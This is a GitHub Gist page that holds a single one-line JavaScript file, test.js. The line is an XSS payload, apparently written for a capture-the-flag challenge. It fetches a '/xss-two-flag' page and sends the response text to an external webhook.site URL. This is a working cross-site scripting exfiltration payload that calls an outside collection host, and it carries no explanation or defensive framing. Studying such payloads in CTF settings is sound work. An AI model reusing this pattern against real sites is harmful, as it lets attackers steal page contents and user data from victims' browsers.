Skip to content

Instantly share code, notes, and snippets.

View burnoz's full-sized avatar
🧉

Bruno Fernando Zabala Peña burnoz

🧉
View GitHub Profile
@burnoz
burnoz / test.js
Last active March 21, 2026 00:42
fetch('/xss-two-flag').then(r=>r.text()).then(d=>fetch('https://webhook.site/0d5e864f-21bd-43bd-8aea-224e5959d47a/flag?d='+encodeURIComponent(d)))